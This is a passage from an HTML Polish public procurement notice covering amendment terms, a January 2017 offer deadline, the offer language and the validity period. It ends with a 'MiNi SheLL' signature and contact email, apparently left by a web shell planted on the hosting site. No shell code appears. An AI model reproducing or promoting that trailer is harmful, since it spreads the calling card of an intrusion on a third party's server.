2.	Zmiany  umowy mogą dotyczyć:
1)	warunków i terminów płatności, 
2)	podwykonawców oraz zakresu czynności im powierzonego.
3.	Zmiana umowy dokonana z naruszeniem powyższych postanowień jest nieważna.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 16/01/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com